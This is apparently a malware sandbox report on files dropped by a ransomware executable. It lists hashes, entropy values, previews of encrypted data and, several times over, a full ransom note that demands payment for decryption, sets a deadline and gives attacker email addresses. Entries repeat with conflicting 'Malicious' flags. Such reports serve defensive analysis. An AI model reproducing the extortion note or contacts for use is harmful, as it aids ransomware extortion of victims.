                                                                                                                                            SHA-512:AC4E60589A23F408DBFC6B015408ED81FBFB5C4989F68B4A649CF0E20B6097921C6216F8B1FC25D784776ED7C6656F917BB3367A901229DA02CC6FD0B6034408
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:M.........gH...y..,o-.1V8...\u..%$l:......*..j?..g.E...$...M..n..X...j..yw..xN..%@..q.L%..4. ..A<...F.U.r......GU......u.X..1--H...6...<.<9..d...h...r.........V.<...\.[c.m....\}]......}..&......Ay(.8.'...i0*...CZ57:8.....]...G...$.ec..5dq$E....x.....$'..|V,.....1-..bu...K...@~.c.r.V..6.SS....I_.*.q..q..=...U.DL>3....,@..:.h*'..j...f.....t.8.. ..i.\..\L.,o.9H?l..G.@.....S.....`pD.U....:...a..-...C.r......#G.e.'..&........_..h...E.k.l..0..l...g.#~...)..%...*5,..x.Z.}...Q..8....vl...x....:..._K....n..........-^...Oc.OV{.I...R.(+.....B0X._.x..j.&YL.I.i....=..a.nAOG.h......^...e..._..W.X..s..((\.hW.E..)g...n...^.Q..[.F....Y*4...+.>.A]...M..$v.<..|..h.!=.. 2.!..E..L......:...Ur,.p/...-T.\...?....Q........J.&..;^..0%db&.;..,.;.26I.h.Z..d1.U-....[A.Y%JA)S.....]w^.;...i>..8...U.....E...r.d..^.....U...J&...M.NK...{....Z)..........3..#x...->.4...U..Y.R..4X...U..(...&@FLaC.....6D..AY_...q{N..._.*`.`.c./...G*k ........Hi.u..k..<.t,(.U..Y...f..W..q`qJ..d\.
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:OpenPGP Secret Key
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):65802
                                                                                                                                            Entropy (8bit):0.9008664157843917
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:3IpOkwoXqoVeyLnnNGQ3d5XI8trMNpZjLvMqC/erQtq2zUT4jJmF2s:GbVHnnz3d548VopZj4Rekt70GAN
                                                                                                                                            MD5:7EF702D2B8BAF35D4C68E71F25D9E117
                                                                                                                                            SHA1:C54C39B04A036AE601074214FA6B65D98671E672
                                                                                                                                            SHA-256:6DDF3112A30081857E3C54B0551618D9D82CB2E282C309195FBE892A29FA3D6F
                                                                                                                                            SHA-512:2428491A34BBA236F0B03BA1F9FD73B5A74E5546F8753B53A62C1D00BBE6BB47FEE56263B3EB7F6B4D406EF756377F8D24D3C774044FAF87F375249E46AE0C6B
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:.s.p..A......2)...7G..Z...#g../=...Q^...2.w../.X.{$.{.b.E.......V(.a/.....G3bgQ...'=`.|38."NA.h..k.*."...W..g.|...!.)w...G.n?..n.u..Z...l.K.t..}.)...+...[..t.!.%VdE...>D...C..w{.....pq..^...M3.YMQ..5...[.=N4i.o:-R.+.r!X.!t'..?.u./-.F~.6G.p5.![....PY....<.=<s.....,.E^....s;..C....7....}.M....$.4..L...S6t.k9.eQ..H...6d..vK.G....&.....iy.J.n.....7....:*.1..Q.C.+>W..?G#.X. .x;.N...)......F.....r.......".......S.O....z.0.j..z....qDP..V}L(t$(....t8...(g.Vo..{....F.2A..w&c ....$._.88.&....O....&..cQ&.f%.PZ..}c......V..V..G.<.....\1ut..uEaI4t;.3..}....(...S.ItX.7t..!......Q...V.I...&)..l|.d....8.......... ..\.+(.'6.k.1..n.A..0.....[....!...^{@R@Y..~.:.....N.....'X.....d\]~...ni0...;.|R=y..+...&&..z...i..T..?......T...m..\.0I...'..AT&/xt..?..:.....[.[.K.\@5%..j.@....}.C..P.H)......]............E7._a.. .".FC4g.:U.....Z%.F(...K...h:o.......m...H...r.....p.V|..>.$9..Bm.f.d.B".Z....S\..t(;.Z4f;..Cy].VH.....m....2q.X.u.....o.{...X.....9.hi..A..]
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:OpenPGP Secret Key
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):65802
                                                                                                                                            Entropy (8bit):0.9008664157843917
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:3IpOkwoXqoVeyLnnNGQ3d5XI8trMNpZjLvMqC/erQtq2zUT4jJmF2s:GbVHnnz3d548VopZj4Rekt70GAN
                                                                                                                                            MD5:7EF702D2B8BAF35D4C68E71F25D9E117
                                                                                                                                            SHA1:C54C39B04A036AE601074214FA6B65D98671E672
                                                                                                                                            SHA-256:6DDF3112A30081857E3C54B0551618D9D82CB2E282C309195FBE892A29FA3D6F
                                                                                                                                            SHA-512:2428491A34BBA236F0B03BA1F9FD73B5A74E5546F8753B53A62C1D00BBE6BB47FEE56263B3EB7F6B4D406EF756377F8D24D3C774044FAF87F375249E46AE0C6B
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.s.p..A......2)...7G..Z...#g../=...Q^...2.w../.X.{$.{.b.E.......V(.a/.....G3bgQ...'=`.|38."NA.h..k.*."...W..g.|...!.)w...G.n?..n.u..Z...l.K.t..}.)...+...[..t.!.%VdE...>D...C..w{.....pq..^...M3.YMQ..5...[.=N4i.o:-R.+.r!X.!t'..?.u./-.F~.6G.p5.![....PY....<.=<s.....,.E^....s;..C....7....}.M....$.4..L...S6t.k9.eQ..H...6d..vK.G....&.....iy.J.n.....7....:*.1..Q.C.+>W..?G#.X. .x;.N...)......F.....r.......".......S.O....z.0.j..z....qDP..V}L(t$(....t8...(g.Vo..{....F.2A..w&c ....$._.88.&....O....&..cQ&.f%.PZ..}c......V..V..G.<.....\1ut..uEaI4t;.3..}....(...S.ItX.7t..!......Q...V.I...&)..l|.d....8.......... ..\.+(.'6.k.1..n.A..0.....[....!...^{@R@Y..~.:.....N.....'X.....d\]~...ni0...;.|R=y..+...&&..z...i..T..?......T...m..\.0I...'..AT&/xt..?..:.....[.[.K.\@5%..j.@....}.C..P.H)......]............E7._a.. .".FC4g.:U.....Z%.F(...K...h:o.......m...H...r.....p.V|..>.$9..Bm.f.d.B".Z....S\..t(;.Z4f;..Cy].VH.....m....2q.X.u.....o.{...X.....9.hi..A..]
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):758
                                                                                                                                            Entropy (8bit):7.757398001299828
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:23nlpYi4/y3fw1FZM1LFWtGTGd9Dt8fBS7M2fguZGCJw3YgCzRmn:Cp8K3AF+1LNTGd9D2iP0Rem
                                                                                                                                            MD5:44A1C0151BAE261F5827973A4D7EB473
                                                                                                                                            SHA1:C910C740FE5A7460567008E5C807CBF5053F6C43
                                                                                                                                            SHA-256:A0825B5C5FF5627B9B5F719B27AC8B13D0EDEE15CA8A33D05EC05D1F51F197A0
                                                                                                                                            SHA-512:C895B7AEB00EBCAFD820C80ED5A85998E1FC45D17270965BFA3E56F565FB080180E602A3F6822AED4E61A58FF801008F9B670808355074745C8CD7C46A7EF71B
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:....c...S.H...kj....Y#!W!..=^.....a..=..i?....{...a3..@..w8z.....s......b..Q.3.A.f.F..H..K........C/.>Rg.......+.G.$uf.....d&.....x...y9.$.I-%Vk.K...in../.../}C..7M|....K...T.d.......d.."....~M...z.]$pIE...}<.....H7.]....\...*.......X2.."D.?...sjzD.J}.IZ...E..M5..el...Ix<,(...~........F...!".#.. .M..`?..?..z......!...6.........&.Zw....=..Z.;H...X..p4.L7r.b$u..K. .591.[.u...6.<.V.I..<qrP.j.qD.P.....^.(>.>...M.....iCFJM.kT^.........F}$bm.|..#."P.FOi.F4e3cf3260c"}.]r.X.S.gj.-.G.w..<.p..LnN..(g.`..n*E.....S...R.{.n.\.8<.PAi...C.....~.G.........c..v.!..Q.......S..$..:G...b.!.C.c?.....j..J.Z.................`\>.{..Z....f_..J?1H..2.M.;..U^..@...~..D.:cLH.......+...Oz..tf$.e...A.Wi....7s.".t.7l...I...r.l.A0xABADCABA
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):758
                                                                                                                                            Entropy (8bit):7.757398001299828
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:23nlpYi4/y3fw1FZM1LFWtGTGd9Dt8fBS7M2fguZGCJw3YgCzRmn:Cp8K3AF+1LNTGd9D2iP0Rem
                                                                                                                                            MD5:44A1C0151BAE261F5827973A4D7EB473
                                                                                                                                            SHA1:C910C740FE5A7460567008E5C807CBF5053F6C43
                                                                                                                                            SHA-256:A0825B5C5FF5627B9B5F719B27AC8B13D0EDEE15CA8A33D05EC05D1F51F197A0
                                                                                                                                            SHA-512:C895B7AEB00EBCAFD820C80ED5A85998E1FC45D17270965BFA3E56F565FB080180E602A3F6822AED4E61A58FF801008F9B670808355074745C8CD7C46A7EF71B
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:....c...S.H...kj....Y#!W!..=^.....a..=..i?....{...a3..@..w8z.....s......b..Q.3.A.f.F..H..K........C/.>Rg.......+.G.$uf.....d&.....x...y9.$.I-%Vk.K...in../.../}C..7M|....K...T.d.......d.."....~M...z.]$pIE...}<.....H7.]....\...*.......X2.."D.?...sjzD.J}.IZ...E..M5..el...Ix<,(...~........F...!".#.. .M..`?..?..z......!...6.........&.Zw....=..Z.;H...X..p4.L7r.b$u..K. .591.[.u...6.<.V.I..<qrP.j.qD.P.....^.(>.>...M.....iCFJM.kT^.........F}$bm.|..#."P.FOi.F4e3cf3260c"}.]r.X.S.gj.-.G.w..<.p..LnN..(g.`..n*E.....S...R.{.n.\.8<.PAi...C.....~.G.........c..v.!..Q.......S..$..:G...b.!.C.c?.....j..J.Z.................`\>.{..Z....f_..J?1H..2.M.;..U^..@...~..D.:cLH.......+...Oz..tf$.e...A.Wi....7s.".t.7l...I...r.l.A0xABADCABA
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):73922
                                                                                                                                            Entropy (8bit):5.614176285213934
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:eSijcj6jFi1CHWpaf3XTkE0l2iRLmEFNhNoXzFS5E5HiGc:eSiEoRSYwcEFNhNoXzFS5giv
                                                                                                                                            MD5:AC953A78F15F62D230E45D712FB17681
                                                                                                                                            SHA1:8F1A711934737570235DE488F52AD56CACD80D53
                                                                                                                                            SHA-256:1064107DA85276A96D4C8D6E725279DD81FD5383FD5392F249A97988ECA396FE
                                                                                                                                            SHA-512:AAD875F716CD3AC5394E25D6632DA2E78C2ABADCD34CBD4158733C9434C14D62E9E5EFBFBBF8A078EFEF5794666D17E0CAE32D6CFC9604751055034166216232
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:c..G...h......V.)..{..<.{G...GL:.A .....aR."/.e._.....T......a...{..(z]...(<..&=.n.e.'.o...`.S...%..d...H.a..~.5.{..c.v........I.W.V...2..@._f...R..V...H..SFF......g.y..~n.Yr..P.|..4Y.D*.<E5.+......XG..[l..y....O%.'...k...z...eBq..... .xM.yi..c........*...E.qY_$.f.K.[...<(.#.M.......%B.H...p.y.x.b.0.0.P8`...If.T.{~S._.....k4..6....2x..;o./\.T]..4.....<...q.ejv[.^#..h.0..ne......ShLAV.Di<W..#Y04.).Vy..X}y-..-/cD:..6f..*K....~.....J.yr.M....)|Ue#.k.l..l.~.]9...*4WZ._RW].o.b}kP[.UT....."#.D.{...3..cI.._.ja:..c9X...s..................Caz.Y.N..._.E^.+R2NQ_k.*-.f....IY_..cF......o..A...#..Q..y.4j.O.H..ti..!....r.x.+q7.p.....g..q.,ht...i..{f.1%...<.=.1C.u.....&.P.:.^la&....-L.".8..3..z.D.. .......g-......O.......{1..\.<"..f.q@.@.@.g.B.. .].U..h..w........:.t..I6.K.Jh...v......=p.^.~.g'.0.........^.r.|.......>...._}......Pg..c.C...#.R..m....a....7Y...T.W.N i....P.;.....YL..O..O...6.:S......h.C...y....;6.+...}.NT. .F..-.t..K...^H.]W..h7....e
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):73922
                                                                                                                                            Entropy (8bit):5.614176285213934
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:eSijcj6jFi1CHWpaf3XTkE0l2iRLmEFNhNoXzFS5E5HiGc:eSiEoRSYwcEFNhNoXzFS5giv
                                                                                                                                            MD5:AC953A78F15F62D230E45D712FB17681
                                                                                                                                            SHA1:8F1A711934737570235DE488F52AD56CACD80D53
                                                                                                                                            SHA-256:1064107DA85276A96D4C8D6E725279DD81FD5383FD5392F249A97988ECA396FE
                                                                                                                                            SHA-512:AAD875F716CD3AC5394E25D6632DA2E78C2ABADCD34CBD4158733C9434C14D62E9E5EFBFBBF8A078EFEF5794666D17E0CAE32D6CFC9604751055034166216232
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:c..G...h......V.)..{..<.{G...GL:.A .....aR."/.e._.....T......a...{..(z]...(<..&=.n.e.'.o...`.S...%..d...H.a..~.5.{..c.v........I.W.V...2..@._f...R..V...H..SFF......g.y..~n.Yr..P.|..4Y.D*.<E5.+......XG..[l..y....O%.'...k...z...eBq..... .xM.yi..c........*...E.qY_$.f.K.[...<(.#.M.......%B.H...p.y.x.b.0.0.P8`...If.T.{~S._.....k4..6....2x..;o./\.T]..4.....<...q.ejv[.^#..h.0..ne......ShLAV.Di<W..#Y04.).Vy..X}y-..-/cD:..6f..*K....~.....J.yr.M....)|Ue#.k.l..l.~.]9...*4WZ._RW].o.b}kP[.UT....."#.D.{...3..cI.._.ja:..c9X...s..................Caz.Y.N..._.E^.+R2NQ_k.*-.f....IY_..cF......o..A...#..Q..y.4j.O.H..ti..!....r.x.+q7.p.....g..q.,ht...i..{f.1%...<.=.1C.u.....&.P.:.^la&....-L.".8..3..z.D.. .......g-......O.......{1..\.<"..f.q@.@.@.g.B.. .].U..h..w........:.t..I6.K.Jh...v......=p.^.~.g'.0.........^.r.|.......>...._}......Pg..c.C...#.R..m....a....7Y...T.W.N i....P.;.....YL..O..O...6.:S......h.C...y....;6.+...}.NT. .F..-.t..K...^H.]W..h7....e
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):615
                                                                                                                                            Entropy (8bit):7.684617120412606
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:fuusawbF0pZKO8AJp5Q8w2Sj+PufYMzF0WCKokZ+WFuzmfdoa/JiF1pxn:fGhbFEKO1QYSU6YLKokyirmnx
                                                                                                                                            MD5:FC4310C9827DFDBA61D37C3DF0BCE8FD
                                                                                                                                            SHA1:6E22911394C3E3415B845942A3715E8C51D9C75D
                                                                                                                                            SHA-256:7FE228B0C72E1584BFDFCDC13903845B45FE7FA1FF75F8FB5AFF20D15A7141FB
                                                                                                                                            SHA-512:B282E5B7051D1C3F8237EE136892541B4D3BC1F064D648EC11B0810F1C16E1B8D75BF463C33D0B25AC56343CE54924BC49A93D0ED9E571657A8048DACB95E387
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:.}..elm._.X*.f....i6...~@6N.nJ-..}.............i..eVA=..(.wh..C.=.e.$.\.8.b..'Z.F.Z..<..u.....pk.x..|..i..v...5.r...-..46.../..bX..e....5..b...di8.?....._I./..g.h..`......V..&........%......p.S........92........u2.2].1...3.OL..u..k.....t.....r.$..t8.L.B....M..d.....a..-..4...4.;X........C..chJ.....n...T1....{.}....Iz..Plt"}}......s..K(ic...OF..{."a..e..+T.t...uU..6.#.....A.N...2.E.z.wz..A._.c...3......0=. (.r.gLq.'.".M.tT...:.Y.MY. ...M..\.-..).3M..{ol}...W....R.......1.8.G....T Q.{.`<(.j.......#Q..M.........Z.#...D8e.D..)m}.7h..\....U..]......J.....R>..J4x..0xABADCABA
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):615
                                                                                                                                            Entropy (8bit):7.684617120412606
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:fuusawbF0pZKO8AJp5Q8w2Sj+PufYMzF0WCKokZ+WFuzmfdoa/JiF1pxn:fGhbFEKO1QYSU6YLKokyirmnx
                                                                                                                                            MD5:FC4310C9827DFDBA61D37C3DF0BCE8FD
                                                                                                                                            SHA1:6E22911394C3E3415B845942A3715E8C51D9C75D
                                                                                                                                            SHA-256:7FE228B0C72E1584BFDFCDC13903845B45FE7FA1FF75F8FB5AFF20D15A7141FB
                                                                                                                                            SHA-512:B282E5B7051D1C3F8237EE136892541B4D3BC1F064D648EC11B0810F1C16E1B8D75BF463C33D0B25AC56343CE54924BC49A93D0ED9E571657A8048DACB95E387
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.}..elm._.X*.f....i6...~@6N.nJ-..}.............i..eVA=..(.wh..C.=.e.$.\.8.b..'Z.F.Z..<..u.....pk.x..|..i..v...5.r...-..46.../..bX..e....5..b...di8.?....._I./..g.h..`......V..&........%......p.S........92........u2.2].1...3.OL..u..k.....t.....r.$..t8.L.B....M..d.....a..-..4...4.;X........C..chJ.....n...T1....{.}....Iz..Plt"}}......s..K(ic...OF..{."a..e..+T.t...uU..6.#.....A.N...2.E.z.wz..A._.c...3......0=. (.r.gLq.'.".M.tT...:.Y.MY. ...M..\.-..).3M..{ol}...W....R.......1.8.G....T Q.{.`<(.j.......#Q..M.........Z.#...D8e.D..)m}.7h..\....U..]......J.....R>..J4x..0xABADCABA
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):554
                                                                                                                                            Entropy (8bit):7.598045123882006
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:vMVOLLEVbX+bn+WmjD7Hi7McMzcu7iHGBwd7AdpuPdk35sP/yVRFMSn:vMuE9kn77McMzcu7R+wpP3qPKPFMS
                                                                                                                                            MD5:E555BAFDF7F49F58B9D06691AB4C9B36
                                                                                                                                            SHA1:5B5C61BBAF4025041DEE348C83B13392569A859C
                                                                                                                                            SHA-256:9CD5045BAF74321FA033C5B179D133BC44DA71A7230FFA775A8EF275B6DA9F62
                                                                                                                                            SHA-512:BC8D295D71D060A5813115B46C33F4B7AAB7C949B482E57C648385A611392EB9645E32A45F857129796E8942730ED85C68BA62655E136065C16BCDAAA6853249
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:......}C..X..@.\..&....7.)....Rv.?...\A.`............n.HL.=.p.\i..[.4...p<..C.g..M..0...d....m..&).c.P?%..K.r3...O.T..a.A:b..s...Jzr.2....'.XO...5e...e..A.,..N.^...x..B{O.).73..{Td.om..m..H.....[)....i.BU.J...-D....o....Km.4.&.....+M....K....d...E.....*.....d8-complete":true}...........J.f.A..bJ........>..@.:E.%u\|(.n..N...<..<.zS.F.....O;..9../..O.j.9sX....3..I|......%d..M..S...J..eS.n..|:..pe.(Qh..h"..P..K..s..S..V.^.Mp,.j/.S........6{[..< .}.A.`P....R.....F_..-...}../~..x....eAF........U..c.`..D.t.%..m8F.|.....?0xABADCABA
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):554
                                                                                                                                            Entropy (8bit):7.598045123882006
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:vMVOLLEVbX+bn+WmjD7Hi7McMzcu7iHGBwd7AdpuPdk35sP/yVRFMSn:vMuE9kn77McMzcu7R+wpP3qPKPFMS
                                                                                                                                            MD5:E555BAFDF7F49F58B9D06691AB4C9B36
                                                                                                                                            SHA1:5B5C61BBAF4025041DEE348C83B13392569A859C
                                                                                                                                            SHA-256:9CD5045BAF74321FA033C5B179D133BC44DA71A7230FFA775A8EF275B6DA9F62
                                                                                                                                            SHA-512:BC8D295D71D060A5813115B46C33F4B7AAB7C949B482E57C648385A611392EB9645E32A45F857129796E8942730ED85C68BA62655E136065C16BCDAAA6853249
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......}C..X..@.\..&....7.)....Rv.?...\A.`............n.HL.=.p.\i..[.4...p<..C.g..M..0...d....m..&).c.P?%..K.r3...O.T..a.A:b..s...Jzr.2....'.XO...5e...e..A.,..N.^...x..B{O.).73..{Td.om..m..H.....[)....i.BU.J...-D....o....Km.4.&.....+M....K....d...E.....*.....d8-complete":true}...........J.f.A..bJ........>..@.:E.%u\|(.n..N...<..<.zS.F.....O;..9../..O.j.9sX....3..I|......%d..M..S...J..eS.n..|:..pe.(Qh..h"..P..K..s..S..V.^.Mp,.j/.S........6{[..< .}.A.`P....R.....F_..-...}../~..x....eAF........U..c.`..D.t.%..m8F.|.....?0xABADCABA
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:OpenPGP Public Key
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4599
                                                                                                                                            Entropy (8bit):7.958155621632169
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:9ONYmuaKADxjDN/TdskyKPn4juS1USvJPaPHNoh0OeOO:9QburADdDNdXydUSvJPaPsAV
                                                                                                                                            MD5:137A43A249EBDD7C2B0BCD76F08F351F
                                                                                                                                            SHA1:36E8B1A9AFEFC6DE3BF352DFC83FA27318320EE3
                                                                                                                                            SHA-256:C68D0996137DE6942054DC61D2FE61172B589AA32AB95989D72585C9CD595641
                                                                                                                                            SHA-512:6A8BB67D7A4DB0C3B93FC96FE0CB4B10133CD2AF778C3CE899E4CC34F1E833C5CF497A3B7470A10C8CE2C774F67F61DD3441117CFD1147F4B710A00612AFE542
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:..1.I...d._[.....f..`[E.b.1D$.O....i...'N[..l.v..D.....Gr...H...L....ml..z..|.|.6..j.:7.....&J...4..H...u...J...xzp..*+.....O.((r.p%.....Wn..Ha....@.3h..)^..S...........Y..U.l..VD_..A.|...2.......i..:..^.....N....L...3.l....b..3..[@.$.Z(h.[..Y.q.}Z.....@.....!.X.*...J...\.'L.^..x.>.W.........?...F..fs..sZ7l..K.kFB.k,.D........m'........C..`.._Lm........{.;..$.^.x.d.R[......O.............l.....WY).\n\0......IRP2.Q... |o.~..e.. .......k.....L2!........ :.B.....s.......0}R...P.Q..E.X......ok.Vwy...Z................D..Z..y...D.pg%.e".c..w.|q........!...[.x4...fl|W".>.q.7.s...+..{5.I...q.&..E.%8H...<...3.w.f.:Hww.B......3]..1.....t..;..2.-.k.....8....S..Q.~..h.....~CX....MOfF.......\9...j..R......jO......m..X.P .XlC....n..... ..6-.O..w.n.C..*8.....,....fJ\....U....h.c\A...'..7+....Yg+R..p.(..v..)'W....K....(.o....2.~..T.~$.K8.dsJ6uX..vP.....h.%.../.....R..].u..!Dk%.^m.Q.?.J..... .K.Y[T..$...97.....|z...c-..a.c.#.B.......
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:OpenPGP Public Key
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4599
                                                                                                                                            Entropy (8bit):7.958155621632169
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:9ONYmuaKADxjDN/TdskyKPn4juS1USvJPaPHNoh0OeOO:9QburADdDNdXydUSvJPaPsAV
                                                                                                                                            MD5:137A43A249EBDD7C2B0BCD76F08F351F
                                                                                                                                            SHA1:36E8B1A9AFEFC6DE3BF352DFC83FA27318320EE3
                                                                                                                                            SHA-256:C68D0996137DE6942054DC61D2FE61172B589AA32AB95989D72585C9CD595641
